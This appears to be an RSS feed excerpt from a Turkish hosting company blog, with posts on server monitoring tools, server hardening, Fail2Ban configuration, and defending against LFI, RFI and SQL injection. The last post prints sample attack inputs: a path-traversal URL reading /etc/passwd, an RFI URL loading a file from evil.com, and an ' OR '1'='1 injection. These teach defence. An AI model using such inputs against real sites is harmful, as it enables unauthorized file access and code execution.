<p>Sunucu izleme, bir sistemin CPU, RAM, disk, ağ ve servis kullanımının belirli aralıklarla kontrol edilmesi ve bu verilerin raporlanması sürecidir. Bu süreç sayesinde:</p>



<ul class="wp-block-list">
<li>Performans darboğazları erkenden tespit edilir</li>



<li>Güvenlik ihlalleri daha hızlı fark edilir</li>



<li>Sistem durumu sürekli kontrol altında tutulur</li>



<li>SLA (Service Level Agreement) uyumu sağlanır</li>
</ul>



<p>Özellikle yüksek trafik alan sitelerde ya da bulut tabanlı uygulamalarda sunucu izleme, operasyonel süreklilik için kritik öneme sahiptir.</p>



<h2 class="wp-block-heading">Hangi Metrikler İzlenmelidir?</h2>



<p>Etkili bir izleme sistemi, aşağıdaki temel sunucu metriklerini takip etmelidir:</p>



<ul class="wp-block-list">
<li><strong>CPU Kullanımı</strong>: İşlemci üzerindeki yük durumu</li>



<li><strong>RAM Kullanımı</strong>: Bellek tüketim oranları</li>



<li><strong>Disk Kullanımı ve G/Ç (I/O)</strong>: Depolama alanı ve okuma/yazma performansı</li>



<li><strong>Ağ Trafiği</strong>: Gelen ve giden veri miktarı</li>



<li><strong>Servis Durumları</strong>: Apache, NGINX, MySQL gibi servislerin çalışıp çalışmadığı</li>



<li><strong>Günlük Kayıtları (Logs)</strong>: Sistem olayları ve hata kayıtları</li>



<li><strong>Kullanıcı Girişleri</strong>: SSH ve sistem erişim kayıtları</li>



<li><strong>Sıcaklık ve Donanım Durumu</strong>: Fiziksel sunucularda donanım sağlığı</li>
</ul>



<h2 class="wp-block-heading">En İyi Sunucu İzleme Araçları</h2>



<p>Aşağıda piyasada sıkça kullanılan ve farklı ihtiyaçlara hitap eden sunucu izleme yazılımları listelenmiştir.</p>



<h3 class="wp-block-heading">1. <strong>Zabbix</strong></h3>



<ul class="wp-block-list">
<li>Açık kaynaklı ve güçlü bir izleme platformudur</li>



<li>Gerçek zamanlı ağ, sunucu, uygulama ve hizmet izleme desteği sunar</li>



<li>E-posta ve SMS ile uyarı mekanizmaları sağlar</li>



<li>Web arayüzü üzerinden detaylı raporlama yapılabilir</li>
</ul>



<h3 class="wp-block-heading">2. <strong>Nagios</strong></h3>



<ul class="wp-block-list">
<li>Kurumsal düzeyde sistem ve ağ izleme sağlar</li>



<li>Eklenti desteği ile özelleştirilebilir</li>



<li>Topoloji haritaları ve olay bildirimleri güçlüdür</li>



<li>Özellikle Linux sunucular için sıkça tercih edilir</li>
</ul>



<h3 class="wp-block-heading">3. <strong>Prometheus ve Grafana</strong></h3>



<ul class="wp-block-list">
<li>Prometheus zaman serisi veritabanı kullanır, Grafana ise görselleştirme sunar</li>



<li>Kubernetes, Docker gibi modern yapılarla uyumludur</li>



<li>Alarm tanımları ve sorgu desteği çok gelişmiştir</li>



<li>DevOps ekipleri tarafından yaygın şekilde kullanılmaktadır</li>
</ul>



<h3 class="wp-block-heading">4. <strong>Netdata</strong></h3>



<ul class="wp-block-list">
<li>Gerçek zamanlı ve düşük kaynak tüketimli bir izleyicidir</li>



<li>Otomatik yapılandırma ile hızlı kurulum sunar</li>



<li>Web arayüzü üzerinden anlık grafikler sunar</li>



<li>Uyarı sistemi özelleştirilebilir</li>
</ul>



<h3 class="wp-block-heading">5. <strong>Datadog</strong></h3>



<ul class="wp-block-list">
<li>Bulut tabanlı, ücretli ve güçlü bir izleme servisidir</li>



<li>Uygulama, sunucu, ağ ve güvenlik takibi yapılabilir</li>



<li>AWS, Azure, GCP gibi servislerle entegre çalışır</li>



<li>Özellikle büyük ölçekli organizasyonlar için idealdir</li>
</ul>



<h3 class="wp-block-heading">6. <strong>Munin</strong></h3>



<ul class="wp-block-list">
<li>Grafik tabanlı ve açık kaynaklı bir sistem izleme aracıdır</li>



<li>Linux sistemleri için hızlı ve sade çözüm sunar</li>



<li>Kaynak kullanımı oldukça düşüktür</li>



<li>Haftalık ve aylık raporlar oluşturabilir</li>
</ul>



<h3 class="wp-block-heading">7. <strong>New Relic</strong></h3>



<ul class="wp-block-list">
<li>Uygulama performans takibi (APM) özelliği ile öne çıkar</li>



<li>Gerçek zamanlı analiz ve performans ölçümü sunar</li>



<li>Dağıtık sistemler için uygundur</li>



<li>Web ve mobil uygulamalar için APM desteği bulunur</li>
</ul>



<h2 class="wp-block-heading">Güvenlik Takibi ve Log İzleme</h2>



<p>Sunucu izleme sadece performansla sınırlı değildir. <strong>Güvenlik olayları</strong> da izlenmeli ve raporlanmalıdır.</p>



<h3 class="wp-block-heading">Kullanılabilecek Güvenlik Takip Araçları:</h3>



<ul class="wp-block-list">
<li><strong>Fail2Ban</strong>: SSH brute-force saldırılarını engeller</li>



<li><strong>OSSEC</strong>: Dosya değişikliği, rootkit tarama ve log analizi sağlar</li>



<li><strong>Wazuh</strong>: Gelişmiş olay izleme ve SIEM entegrasyonu sunar</li>



<li><strong>Logwatch</strong> veya <strong>GoAccess</strong>: Sunucu loglarının okunabilir raporlar haline getirilmesini sağlar</li>
</ul>



<h2 class="wp-block-heading">İzleme Sonuçlarının Raporlanması ve Bildirimler</h2>



<p>İzleme araçlarının çoğu olaylara göre:</p>



<ul class="wp-block-list">
<li>E-posta</li>



<li>SMS</li>



<li>Slack, Discord gibi platformlara webhook ile bildirim gönderebilir</li>
</ul>



<p>Bu sayede sistem yöneticileri 7/24 sunucu durumu hakkında bilgi sahibi olabilir ve gerektiğinde müdahale edebilir.</p>



<h2 class="wp-block-heading">Sunucu İzlemede Otomasyon ve Yapay Zeka</h2>



<p>Yeni nesil izleme çözümleri, otomatik anomali tespiti ve makine öğrenmesi kullanarak sistemleri daha akıllı şekilde takip eder. Bu teknolojiler sayesinde:</p>



<ul class="wp-block-list">
<li>Geçmişe göre normal dışı aktiviteler algılanır</li>



<li>Olası kesintiler önceden tahmin edilir</li>



<li>İnsan müdahalesine gerek kalmadan bazı sorunlara otomatik çözüm uygulanabilir</li>
</ul>



<h2 class="wp-block-heading">Sonuç</h2>



<p>Sunucu izleme araçları, hem performans optimizasyonu hem de güvenlik denetimi açısından kritik rol oynar. Zabbix, Prometheus, Datadog gibi güçlü çözümler ile sistem kaynaklarını izlemek, anlık uyarılar almak ve raporlama yapmak mümkündür. İşletmenizin büyüklüğü, altyapısı ve hedeflerine göre doğru aracı seçmek, sunucu güvenliği ve erişilebilirliği açısından büyük avantaj sağlar.</p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/sunucu-izleme-araclari-nelerdir-gercek-zamanli-performans-ve-guvenlik-takibi/" data-wpel-link="exclude">Sunucu İzleme Araçları Nelerdir? Gerçek Zamanlı Performans ve Güvenlik Takibi</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Sunucu Güvenliği Nasıl Sağlanır? Firewall, DDoS Koruması ve Güncelleme Stratejileri</title>
		<link>https://www.cenuta.com/blog/sunucu-guvenligi-nasil-saglanir-firewall-ddos-korumasi-ve-guncelleme-stratejileri/</link>
		
		<dc:creator><![CDATA[Ömer Yüksel]]></dc:creator>
		<pubDate>Fri, 16 May 2025 05:34:11 +0000</pubDate>
				<category><![CDATA[Sunucu]]></category>
		<guid isPermaLink="false">https://www.cenuta.com/blog/?p=23323</guid>

					<description><![CDATA[<p>Sunucu güvenliği, hem bireysel kullanıcılar hem de kurumsal firmalar için<a href="https://www.cenuta.com/blog/sunucu-guvenligi-nasil-saglanir-firewall-ddos-korumasi-ve-guncelleme-stratejileri/" data-wpel-link="exclude">...</a></p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/sunucu-guvenligi-nasil-saglanir-firewall-ddos-korumasi-ve-guncelleme-stratejileri/" data-wpel-link="exclude">Sunucu Güvenliği Nasıl Sağlanır? Firewall, DDoS Koruması ve Güncelleme Stratejileri</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Sunucu güvenliği, hem bireysel kullanıcılar hem de kurumsal firmalar için dijital altyapının korunmasında hayati öneme sahiptir. Siber saldırıların sayısı ve karmaşıklığı giderek artarken, sunucuların güvenliğinin sağlanması sadece bir tercih değil, zorunluluk haline gelmiştir. Bu yazıda, etkili sunucu güvenliği sağlamak için kullanabileceğiniz temel stratejileri, araçları ve uygulamaları detaylı şekilde ele alacağız.</p>



<h2 class="wp-block-heading">Sunucu Güvenliği Neden Önemlidir?</h2>



<p>Sunucular, bir web sitesinin, uygulamanın ya da veritabanının arkasındaki temel altyapıyı oluşturur. Sunucuya yapılan herhangi bir saldırı, veri kaybı, hizmet kesintisi ve maddi zarar gibi ciddi sonuçlar doğurabilir. Ayrıca, güvenliği ihlal edilen bir sunucu kötü amaçlı yazılımların yayılmasına da zemin hazırlayabilir.</p>



<h2 class="wp-block-heading">1. Güçlü Bir Firewall (Güvenlik Duvarı) Kurulumu</h2>



<h3 class="wp-block-heading">Güvenlik Duvarı Nedir?</h3>



<p>Firewall, yetkisiz erişimleri engellemek için sunucunun gelen ve giden trafiğini denetleyen bir güvenlik sistemidir. Hem donanım tabanlı hem de yazılım tabanlı olarak kurulabilir.</p>



<h3 class="wp-block-heading">Hangi Tür Firewall Kullanılmalı?</h3>



<ul class="wp-block-list">
<li><strong>Ağ Seviyesinde Firewall (Network Firewall)</strong>: Tüm ağı korur.</li>



<li><strong>Sunucu Bazlı Firewall (Host-based Firewall)</strong>: Belirli bir sunucu için özelleştirilir. (Örn: iptables, ufw)</li>



<li><strong>Web Uygulama Güvenlik Duvarı (WAF)</strong>: Web uygulamalarını hedef alan saldırılara karşı koruma sağlar. (Örn: ModSecurity)</li>
</ul>



<h3 class="wp-block-heading">En İyi Uygulamalar</h3>



<ul class="wp-block-list">
<li>Gereksiz portları kapatın.</li>



<li>Yalnızca belirli IP’lerden gelen bağlantılara izin verin.</li>



<li>SSH gibi servislerde IP kısıtlamaları uygulayın.</li>
</ul>



<h2 class="wp-block-heading">2. DDoS (Dağıtık Hizmet Reddi) Saldırılarına Karşı Koruma</h2>



<h3 class="wp-block-heading">DDoS Nedir?</h3>



<p>DDoS saldırıları, bir sunucunun veya ağın kaynaklarını tüketmek amacıyla aynı anda birçok noktadan yoğun trafik gönderilerek hizmetin erişilemez hale getirilmesidir.</p>



<h3 class="wp-block-heading">DDoS Koruma Yöntemleri</h3>



<ul class="wp-block-list">
<li><strong>Trafik Filtreleme</strong>: CDN ve WAF kullanarak kötü niyetli trafiği engelleyin.</li>



<li><strong>Rate Limiting</strong>: IP başına istek sayısını sınırlayarak sunucunun yükünü azaltın.</li>



<li><strong>Anti-DDoS Servisleri</strong>: Cloudflare, Akamai, AWS Shield gibi profesyonel çözümler kullanın.</li>



<li><strong>Yük Dengeleme (Load Balancing)</strong>: Trafiği farklı sunuculara dağıtarak yoğunluğu azaltın.</li>
</ul>



<h2 class="wp-block-heading">3. Yazılım ve Sistem Güncellemeleri</h2>



<h3 class="wp-block-heading">Güncel Sistemler Neden Önemlidir?</h3>



<p>Eski sürüm yazılımlar, bilinen güvenlik açıklarını içerir ve saldırganlar bu açıkları kolaylıkla istismar edebilir. Yazılım ve işletim sisteminizi güncel tutmak, bilinen zafiyetlere karşı en etkili savunmadır.</p>



<h3 class="wp-block-heading">Güncelleme Stratejileri</h3>



<ul class="wp-block-list">
<li><strong>Otomatik Güncellemeler</strong>: Güvenlik güncellemeleri için otomatik güncelleme mekanizmasını aktif hale getirin.</li>



<li><strong>Paket Takibi</strong>: Kullanılan yazılımlar için güncelleme duyurularını düzenli olarak takip edin.</li>



<li><strong>Versiyon Takibi</strong>: PHP, Apache, Nginx, MySQL gibi servislerin güncel sürümlerini kullanın.</li>
</ul>



<h2 class="wp-block-heading">4. Erişim Kontrolü ve Kimlik Doğrulama</h2>



<h3 class="wp-block-heading">Yetkisiz Girişleri Engelleyin</h3>



<ul class="wp-block-list">
<li><strong>SSH Anahtar Tabanlı Giriş</strong>: Parola yerine daha güvenli olan SSH anahtarlarını kullanın.</li>



<li><strong>Fail2Ban</strong>: Belirli sayıda başarısız girişten sonra IP&#8217;yi otomatik olarak engelleyen araç.</li>



<li><strong>2FA (İki Faktörlü Kimlik Doğrulama)</strong>: Sunucu yönetimi panelleri ve yönetici erişimi için mutlaka kullanın.</li>
</ul>



<h2 class="wp-block-heading">5. Loglama ve İzleme Sistemleri</h2>



<h3 class="wp-block-heading">İzleme Neden Gereklidir?</h3>



<p>Sunucuda olup bitenleri anlamak için log kayıtlarının düzenli olarak izlenmesi gerekir. Bu sayede anormal davranışlar erken tespit edilebilir.</p>



<h3 class="wp-block-heading">Kullanılabilecek İzleme Araçları</h3>



<ul class="wp-block-list">
<li><strong>Logwatch / Logrotate</strong>: Linux sunucularda log yönetimi.</li>



<li><strong>Nagios / Zabbix / Prometheus</strong>: Gerçek zamanlı sistem ve servis izleme.</li>



<li><strong>Fail2Ban</strong>: Kötü niyetli giriş denemelerini tespit ederek otomatik olarak müdahale eder.</li>
</ul>



<h2 class="wp-block-heading">6. Yedekleme ve Olası Saldırıya Hazırlık</h2>



<h3 class="wp-block-heading">Yedekleme Neden Olmazsa Olmaz?</h3>



<p>Her zaman en kötü senaryo düşünülmeli. Düzenli olarak alınan yedekler, olası bir saldırı sonrası sistemi hızlıca eski haline döndürmeyi sağlar.</p>



<h3 class="wp-block-heading">Etkili Yedekleme Stratejileri</h3>



<ul class="wp-block-list">
<li><strong>Günlük/Haftalık Otomatik Yedekleme</strong></li>



<li><strong>Harici Lokasyonda Saklama</strong></li>



<li><strong>Şifreli Yedekleme Dosyaları</strong></li>



<li><strong>Yedeklerin Geri Yüklenme Testi</strong></li>
</ul>



<h2 class="wp-block-heading">Sonuç</h2>



<p>Sunucu güvenliği, tek bir uygulama ya da araçla sağlanamayacak kadar kapsamlı ve çok katmanlı bir süreçtir. Güvenlik duvarı, DDoS koruması, güncellemeler, erişim kontrolleri ve yedekleme sistemleri birlikte çalıştığında güçlü bir koruma kalkanı oluşturur. Bu stratejileri düzenli olarak gözden geçirip uygulamak, sunucularınızı hem dış tehditlere hem de iç zafiyetlere karşı korumanızı sağlar.</p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/sunucu-guvenligi-nasil-saglanir-firewall-ddos-korumasi-ve-guncelleme-stratejileri/" data-wpel-link="exclude">Sunucu Güvenliği Nasıl Sağlanır? Firewall, DDoS Koruması ve Güncelleme Stratejileri</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Fail2Ban Nedir ve Nasıl Çalışır? Brute Force Saldırılarına Karşı Nasıl Korunulur?</title>
		<link>https://www.cenuta.com/blog/fail2ban-nedir-ve-nasil-calisir-brute-force-saldirilarina-karsi-nasil-korunulur/</link>
		
		<dc:creator><![CDATA[Ömer Yüksel]]></dc:creator>
		<pubDate>Tue, 22 Apr 2025 05:38:24 +0000</pubDate>
				<category><![CDATA[Sunucu]]></category>
		<guid isPermaLink="false">https://www.cenuta.com/blog/?p=23203</guid>

					<description><![CDATA[<p>Sunucu güvenliği, özellikle dışa açık sistemler söz konusu olduğunda kritik<a href="https://www.cenuta.com/blog/fail2ban-nedir-ve-nasil-calisir-brute-force-saldirilarina-karsi-nasil-korunulur/" data-wpel-link="exclude">...</a></p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/fail2ban-nedir-ve-nasil-calisir-brute-force-saldirilarina-karsi-nasil-korunulur/" data-wpel-link="exclude">Fail2Ban Nedir ve Nasıl Çalışır? Brute Force Saldırılarına Karşı Nasıl Korunulur?</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Sunucu güvenliği, özellikle dışa açık sistemler söz konusu olduğunda kritik önem taşır. SSH, FTP, HTTP gibi servisler üzerinden yapılan brute force saldırıları; kullanıcı adı ve parola kombinasyonlarını deneme-yanılma yöntemiyle ele geçirmeyi hedefler. Fail2Ban, bu tür saldırılara karşı sistem yöneticilerine etkili bir koruma mekanizması sunar.</p>



<h2 class="wp-block-heading">Fail2Ban Nedir?</h2>



<p>Fail2Ban, Linux tabanlı sistemlerde çalışan açık kaynaklı bir güvenlik aracıdır. Temel görevi, log dosyalarını analiz ederek başarısız oturum açma girişimlerini tespit etmek ve belirlenen eşik değerlerin aşılması durumunda saldırgan IP adreslerini otomatik olarak engellemektir.</p>



<p>Fail2Ban, özellikle SSH, FTP, NGINX, Apache gibi yaygın servislerin log kayıtlarını izleyerek brute force, yetkisiz erişim ve kötü niyetli bot aktivitelerine karşı etkili bir savunma sağlar.</p>



<h2 class="wp-block-heading">Fail2Ban Nasıl Çalışır?</h2>



<p>Fail2Ban&#8217;ın çalışma mantığı oldukça basittir ancak etkilidir:</p>



<ol class="wp-block-list">
<li><strong>Log Analizi</strong>: Fail2Ban, yapılandırılmış servislerin log dosyalarını düzenli olarak okur.</li>



<li><strong>Kuralların Uygulanması (Filters)</strong>: Loglarda belirli desenleri (örneğin “authentication failure” gibi) tespit etmek için filtre kuralları uygulanır.</li>



<li><strong>Eşik Değer Kontrolü</strong>: Belirli bir süre içinde çok sayıda başarısız girişim varsa bu bir tehdit olarak değerlendirilir.</li>



<li><strong>IP Engelleme (Banning)</strong>: Tehdit oluşturan IP adresi, belirli bir süre boyunca veya kalıcı olarak firewall aracılığıyla engellenir.</li>



<li><strong>Unban Süreci</strong>: Engellenen IP’ler belirlenen süre sonunda otomatik olarak beyaz listeye alınabilir veya kalıcı olarak yasaklanabilir.</li>
</ol>



<h2 class="wp-block-heading">Fail2Ban Kurulumu</h2>



<p>Fail2Ban, Debian, Ubuntu, CentOS gibi pek çok Linux dağıtımında kolayca kurulabilir.</p>



<h3 class="wp-block-heading">Debian/Ubuntu için Kurulum</h3>



<pre class="wp-block-code"><code>sudo apt update
sudo apt install fail2ban
</code></pre>



<h3 class="wp-block-heading">CentOS/RHEL için Kurulum</h3>



<pre class="wp-block-code"><code>sudo yum install epel-release
sudo yum install fail2ban
</code></pre>



<p>Kurulumdan sonra servis başlatılır ve sistem açılışında otomatik olarak başlaması sağlanır:</p>



<pre class="wp-block-code"><code>sudo systemctl enable fail2ban
sudo systemctl start fail2ban
</code></pre>



<h2 class="wp-block-heading">Fail2Ban Yapılandırması</h2>



<p>Fail2Ban yapılandırma dosyaları genellikle <code>/etc/fail2ban/</code> dizininde yer alır. Ana yapılandırma dosyası <code>jail.conf</code> olup, bu dosya doğrudan düzenlenmemelidir. Bunun yerine <code>jail.local</code> adında bir kopya oluşturulup üzerinde özelleştirme yapılması önerilir.</p>



<p>Örnek <code>jail.local</code> yapılandırması:</p>



<pre class="wp-block-code"><code>&#091;sshd]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 5
bantime = 3600
findtime = 600
</code></pre>



<p>Bu örnekte, SSH servisi üzerinden 10 dakika içinde 5&#8217;ten fazla başarısız girişim yapan IP adresi 1 saatliğine engellenecektir.</p>



<h2 class="wp-block-heading">Sık Kullanılan Fail2Ban Komutları</h2>



<ul class="wp-block-list">
<li>Fail2Ban servis durumu:<br><code>sudo systemctl status fail2ban</code></li>



<li>Aktif jails listesini görüntüleme:<br><code>sudo fail2ban-client status</code></li>



<li>Belirli bir jail durumu:<br><code>sudo fail2ban-client status sshd</code></li>



<li>IP adresini manuel olarak banlama:<br><code>sudo fail2ban-client set sshd banip 192.168.1.100</code></li>



<li>IP adresini unban yapma:<br><code>sudo fail2ban-client set sshd unbanip 192.168.1.100</code></li>
</ul>



<h2 class="wp-block-heading">Fail2Ban ile Hangi Servisler Korunabilir?</h2>



<p>Fail2Ban, yapılandırılabilir filtre sistemi sayesinde pek çok servisi koruyabilir:</p>



<ul class="wp-block-list">
<li>SSH</li>



<li>FTP (vsftpd, proftpd)</li>



<li>Web sunucuları (Apache, NGINX)</li>



<li>Mail sunucuları (Postfix, Dovecot)</li>



<li>PHP, MySQL gibi uygulama loglarına özel filtrelerle genişletme</li>
</ul>



<h2 class="wp-block-heading">Brute Force Saldırılarına Karşı Fail2Ban’ın Avantajları</h2>



<ul class="wp-block-list">
<li>Gerçek zamanlı izleme ile saldırıları anında engelleme</li>



<li>Otomatik IP ban sistemi sayesinde yöneticinin manuel müdahalesine gerek bırakmaması</li>



<li>Esnek filtreleme ve jail yapılandırması ile çok sayıda hizmet için özelleştirilebilir koruma</li>



<li>Firewall seviyesinde engelleme ile etkili sonuçlar üretme</li>
</ul>



<h2 class="wp-block-heading">Güvenliği Artırmak İçin Ekstra Önlemler</h2>



<p>Fail2Ban tek başına güçlü bir çözümdür ancak sistem güvenliğini artırmak için aşağıdaki adımlar da önerilir:</p>



<ul class="wp-block-list">
<li>SSH bağlantılarını yalnızca belirli IP adreslerine açık hale getirmek</li>



<li>SSH portunu değiştirmek (varsayılan 22 yerine farklı bir port)</li>



<li>Karmaşık ve uzun parolalar kullanmak</li>



<li>SSH anahtar tabanlı kimlik doğrulama kullanmak</li>



<li>Fail2Ban bantime süresini artırmak</li>
</ul>



<h2 class="wp-block-heading">Sonuç</h2>



<p>Fail2Ban, brute force saldırılarına karşı etkili, esnek ve kolay yönetilebilir bir çözüm sunar. Özellikle SSH gibi sık hedef alınan servislerde, log temelli tehdit tespiti ve otomatik IP engelleme yetenekleri sayesinde, sistem yöneticileri için vazgeçilmez bir güvenlik bileşenidir. Linux sunucunuzu dış tehditlere karşı güçlendirmek ve güvenliği otomatikleştirmek istiyorsanız, Fail2Ban kullanımı mutlaka değerlendirilmelidir.</p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/fail2ban-nedir-ve-nasil-calisir-brute-force-saldirilarina-karsi-nasil-korunulur/" data-wpel-link="exclude">Fail2Ban Nedir ve Nasıl Çalışır? Brute Force Saldırılarına Karşı Nasıl Korunulur?</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>LFI, RFI, SQL Injection Gibi Zafiyetlere Karşı Sunucu Güvenliği</title>
		<link>https://www.cenuta.com/blog/lfi-rfi-sql-injection-gibi-zafiyetlere-karsi-sunucu-guvenligi/</link>
		
		<dc:creator><![CDATA[Ömer Yüksel]]></dc:creator>
		<pubDate>Tue, 22 Apr 2025 05:35:14 +0000</pubDate>
				<category><![CDATA[Sunucu]]></category>
		<guid isPermaLink="false">https://www.cenuta.com/blog/?p=23200</guid>

					<description><![CDATA[<p>Web uygulamalarının güvenliği, sadece yazılım katmanında değil, aynı zamanda sunucu<a href="https://www.cenuta.com/blog/lfi-rfi-sql-injection-gibi-zafiyetlere-karsi-sunucu-guvenligi/" data-wpel-link="exclude">...</a></p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/lfi-rfi-sql-injection-gibi-zafiyetlere-karsi-sunucu-guvenligi/" data-wpel-link="exclude">LFI, RFI, SQL Injection Gibi Zafiyetlere Karşı Sunucu Güvenliği</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Web uygulamalarının güvenliği, sadece yazılım katmanında değil, aynı zamanda sunucu tarafında da sıkı önlemler alınmasını gerektirir. Local File Inclusion (LFI), Remote File Inclusion (RFI) ve SQL Injection gibi saldırılar, sistemlerin zaaflarını hedef alarak hem veri ihlallerine hem de sistem kontrolünün ele geçirilmesine neden olabilir. Bu makalede, söz konusu zafiyetlerin ne olduğu, nasıl çalıştığı ve bu zafiyetlere karşı alınabilecek sunucu tabanlı güvenlik önlemleri detaylı şekilde ele alınmaktadır.</p>



<h2 class="wp-block-heading">LFI (Local File Inclusion) Nedir?</h2>



<p>LFI, saldırganın hedef sistemdeki dosyaları çağırmasına veya çalıştırmasına olanak sağlayan bir güvenlik açığıdır. Genellikle PHP tabanlı uygulamalarda görülür ve <code>include</code>, <code>require</code> gibi fonksiyonların kullanıcı girdisiyle kontrolsüz kullanılması durumunda ortaya çıkar.</p>



<h3 class="wp-block-heading">LFI Saldırısının Tipik Kullanımı</h3>



<pre class="wp-block-code"><code>http:&#047;&#047;example.com/page.php?file=../../../../etc/passwd
</code></pre>



<h3 class="wp-block-heading">LFI&#8217;ye Karşı Alınması Gereken Önlemler</h3>



<ul class="wp-block-list">
<li><code>allow_url_include</code> ve <code>allow_url_fopen</code> direktiflerinin devre dışı bırakılması</li>



<li>Dosya dahil etme işlemlerinde sabit tanımlamalar (whitelisting) kullanılması</li>



<li>Kullanıcı girdisinin sanitize ve validate edilmesi</li>



<li>PHP&#8217;de <code>basename()</code> ve <code>realpath()</code> kontrollerinin entegre edilmesi</li>



<li>Web sunucusu seviyesinde dosya erişim izinlerinin sınırlandırılması</li>
</ul>



<h2 class="wp-block-heading">RFI (Remote File Inclusion) Nedir?</h2>



<p>RFI, uzak bir kaynaktan dosya çağırmaya ve çalıştırmaya olanak sağlayan bir güvenlik zafiyetidir. LFI’den farklı olarak saldırganın kendi kontrolündeki bir sunucudan zararlı dosya çalıştırması mümkündür.</p>



<h3 class="wp-block-heading">RFI Saldırısının Tipik Kullanımı</h3>



<pre class="wp-block-code"><code>http:&#047;&#047;example.com/page.php?file=http://evil.com/malicious.txt
</code></pre>



<h3 class="wp-block-heading">RFI&#8217;ye Karşı Sunucu Taraflı Güvenlik Önlemleri</h3>



<ul class="wp-block-list">
<li><code>allow_url_fopen</code> ve <code>allow_url_include</code> değerlerinin <code>Off</code> yapılması</li>



<li>Sunucu tarafında dış URL’lerin içe aktarılmasının engellenmesi</li>



<li>Dosya içeriği işlemlerinde sadece yerel path’lerin kullanılması</li>



<li>Web uygulama güvenlik duvarı (WAF) ile şüpheli URL parametrelerinin engellenmesi</li>
</ul>



<h2 class="wp-block-heading">SQL Injection Nedir?</h2>



<p>SQL Injection, kullanıcı girişleri aracılığıyla SQL sorgularının manipüle edilmesini sağlar. Bu zafiyet, veritabanına doğrudan müdahale ile veri çalınmasına, güncellenmesine veya silinmesine neden olabilir.</p>



<h3 class="wp-block-heading">SQL Injection Saldırısının Örneği</h3>



<pre class="wp-block-code"><code>SELECT * FROM users WHERE username = '$user' AND password = '$pass';
</code></pre>



<p>Eğer <code>$user</code> değeri <code>' OR '1'='1</code> şeklinde girilirse tüm kullanıcılar listelenebilir.</p>



<h3 class="wp-block-heading">SQL Injection’a Karşı Alınması Gereken Önlemler</h3>



<ul class="wp-block-list">
<li>Hazır SQL sorguları yerine parametreli (prepared) sorgular kullanılmalıdır</li>



<li>ORM (Object Relational Mapping) kullanımı tercih edilmelidir</li>



<li>Kullanıcı girdileri hem istemci hem sunucu tarafında doğrulanmalıdır</li>



<li>Veritabanı kullanıcılarına minimum yetki verilmelidir (örneğin sadece SELECT)</li>



<li>SQL hatalarının kullanıcıya gösterilmesi engellenmelidir (display_errors = Off)</li>
</ul>



<h2 class="wp-block-heading">Sunucu Tarafında Genel Güvenlik Önlemleri</h2>



<h3 class="wp-block-heading">1. Dosya ve Dizin İzinleri</h3>



<ul class="wp-block-list">
<li>Web dizinlerinde yazılabilir dosya bırakılmamalı</li>



<li><code>/var/www/html</code> gibi dizinlerde sadece okunabilir ve çalıştırılabilir izinler tanımlanmalı</li>



<li><code>chmod</code>, <code>chown</code> ve <code>umask</code> ayarları düzenli kontrol edilmelidir</li>
</ul>



<h3 class="wp-block-heading">2. Web Uygulama Güvenlik Duvarı (WAF)</h3>



<ul class="wp-block-list">
<li>ModSecurity gibi WAF sistemleri, bilinen LFI, RFI, SQL Injection imzalarını tespit eder ve engeller</li>



<li>WAF ile gelen tüm HTTP istekleri analiz edilerek şüpheli davranışlar otomatik engellenebilir</li>
</ul>



<h3 class="wp-block-heading">3. Güncellemelerin Takibi ve Yama Yönetimi</h3>



<ul class="wp-block-list">
<li>PHP, MySQL, Apache/Nginx gibi servisler düzenli olarak güncellenmeli</li>



<li>Yazılım bağımlılıklarında kullanılan kütüphaneler (örneğin Composer paketleri) denetlenmelidir</li>
</ul>



<h3 class="wp-block-heading">4. Loglama ve İzleme</h3>



<ul class="wp-block-list">
<li>Sunucu erişim logları, PHP hata logları ve veritabanı logları düzenli incelenmelidir</li>



<li>Şüpheli URL kullanımları, çoklu hatalı oturum açma girişimleri gibi olaylar alarmlanmalıdır</li>
</ul>



<h3 class="wp-block-heading">5. Güvenli Kodlama Standartları</h3>



<ul class="wp-block-list">
<li>OWASP Top 10 listesine göre güvenli kodlama pratikleri uygulanmalı</li>



<li>Geliştiricilere periyodik güvenlik eğitimi verilmelidir</li>
</ul>



<h2 class="wp-block-heading">Sonuç</h2>



<p>LFI, RFI ve SQL Injection gibi yaygın zafiyetler, çoğu zaman basit bir ihmal ya da yetersiz giriş kontrolü nedeniyle büyük güvenlik açıklarına dönüşebilir. Bu zafiyetlerin önlenmesi, yalnızca kodlama düzeyinde değil, aynı zamanda sunucu yapılandırması ve güvenlik politikalarının bütüncül olarak ele alınması ile mümkündür. Web uygulamalarının barındırıldığı altyapı, bu tehditlere karşı her an tetikte olacak şekilde tasarlanmalı ve denetlenmelidir.</p>
